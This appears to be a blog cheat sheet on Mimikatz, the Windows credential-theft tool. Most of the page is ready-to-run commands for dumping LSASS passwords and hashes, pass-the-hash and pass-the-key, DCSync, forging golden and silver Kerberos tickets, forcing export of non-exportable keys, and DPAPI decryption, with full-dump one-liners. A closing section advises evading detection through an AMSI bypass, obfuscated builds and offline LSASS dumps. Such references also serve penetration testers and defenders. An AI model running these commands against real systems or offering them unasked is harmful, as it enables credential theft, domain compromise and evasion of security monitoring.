Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Mimikatz

Mimikatz is a Windows post-exploitation tool developed by Benjamin Delpy that extracts credentials, hashes, PINs, and Kerberos tickets from memory. It is one of the most widely used tools for credential theft and lateral movement in Windows environments.

Key Capabilities

  • Credential Extraction: Dump plaintext passwords, hashes, and Kerberos tickets from LSASS memory
  • Pass-the-Hash/Pass-the-Ticket: Use extracted credentials for lateral movement
  • DPAPI Attacks: Decrypt Windows Data Protection API protected secrets
  • Golden/Silver Tickets: Forge Kerberos tickets for persistence
  • DCSync: Replicate credentials from Domain Controllers

Installation

Mimikatz is not installed via package managers. Download from the official repository:

https://github.com/gentilkiwi/mimikatz/releases

For evasion, consider using:

  • Invoke-Mimikatz: PowerShell version
  • pypykatz: Python implementation (cross-platform)

Basic Usage

Enable Debug Privileges

privilege::debug

Required for accessing LSASS memory. Returns Privilege '20' OK on success.

Dump All Credentials from LSASS

sekurlsa::logonpasswords

Dump Credential Manager Secrets

sekurlsa::credman

Export Kerberos Tickets

sekurlsa::tickets /export

Common Modules

ModulePurpose
sekurlsaExtract credentials from LSASS memory
lsadumpDump LSA secrets, SAM database, DCSync
kerberosKerberos ticket operations
vaultWindows Vault/Credential Manager
dpapiDPAPI masterkey and blob decryption
cryptoCertificate and key operations (Pass-the-Certificate)
tokenToken manipulation

sekurlsa Module

Dump Logon Passwords

sekurlsa::logonpasswords

Dump Credential Manager

sekurlsa::credman

Dump DPAPI Masterkeys

sekurlsa::dpapi

Dump Kerberos Tickets

sekurlsa::tickets

Pass-the-Hash

sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:<hash> /run:cmd

Dump Kerberos Encryption Keys

sekurlsa::ekeys

Extracts AES256, AES128, and RC4 keys for Kerberos authentication. Useful for Pass the Key / OverPass the Hash attacks.

Pass the Key / OverPass the Hash

sekurlsa::pth /user:Administrator /domain:DOMAIN /aes256:<aes256_hash> /run:cmd

Converts a Kerberos key (AES256, AES128, or RC4) into a full TGT. The spawned process can then request service tickets for lateral movement.

crypto Module (Certificates)

Used for certificate operations related to Pass-the-Certificate attacks and AD CS abuse.

Export User Certificates

crypto::certificates /export

Export Machine Certificates

crypto::certificates /systemstore:local_machine /export

Make Non-Exportable Keys Exportable

crypto::capi
crypto::cng

Patches CryptoAPI/CNG to allow export of keys marked as non-exportable. Run before exporting certificates.

Common crypto Commands

CommandDescription
crypto::capiPatch CryptoAPI for key export
crypto::cngPatch CNG for key export
crypto::certificates /exportExport user certificates to PFX
crypto::certificates /systemstore:local_machine /exportExport machine certificates
crypto::keysList cryptographic keys
crypto::storesList certificate stores

lsadump Module

Dump SAM Database

lsadump::sam

Dump LSA Secrets

lsadump::secrets

Dump Cached Domain Credentials

lsadump::cache

DCSync (requires Domain Admin or replication rights)

lsadump::dcsync /domain:domain.local /user:Administrator
lsadump::dcsync /domain:domain.local /all /csv

Kerberos Attacks

Golden Ticket (requires krbtgt hash)

kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt

Silver Ticket (requires service account hash)

kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /target:server.domain.local /service:cifs /rc4:<hash> /ptt

Pass-the-Ticket

kerberos::ptt <ticket.kirbi>

List Tickets

kerberos::list

Purge Tickets

kerberos::purge

DPAPI Attacks

List Vault Credentials

vault::list
vault::cred

Decrypt DPAPI Blob

dpapi::blob /in:<blob_file> /masterkey:<key>

Decrypt Credential File

dpapi::cred /in:<credential_file>

Extract Masterkey (with RPC to DC)

dpapi::masterkey /in:<masterkey_file> /rpc

Offline Attacks

Dump SAM from Registry Hives

lsadump::sam /sam:sam.hive /system:system.hive

Dump Secrets from Registry Hives

lsadump::secrets /system:system.hive /security:security.hive

One-Liner Examples

Full Credential Dump

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

DCSync Single User

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:domain.local /user:krbtgt" "exit"

Export All Kerberos Tickets

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

Detection and Evasion

Common Detection Points

  • LSASS memory access
  • Suspicious process creation
  • Event ID 4624 (logon) with unusual patterns
  • Sysmon Event ID 10 (process access to LSASS)

Evasion Techniques

  • Use pypykatz for offline analysis
  • Memory dump LSASS with procdump, analyze offline
  • Use Invoke-Mimikatz with AMSI bypass
  • Obfuscated/custom-compiled versions
ToolDescription
pypykatzPython implementation (cross-platform)
SharpKatzC# implementation
RubeusC# Kerberos toolkit
ImpacketPython toolkit with secretsdump.py
LaZagneMulti-platform credential recovery

Core Takeaways

  • Always run privilege::debug first to enable LSASS access
  • sekurlsa::logonpasswords is the go-to command for credential extraction
  • DCSync requires Domain Admin or specific replication rights
  • Kerberos attacks (Golden/Silver tickets) provide powerful persistence
  • DPAPI attacks can recover Credential Manager, browser, and application secrets
  • Consider offline analysis to avoid detection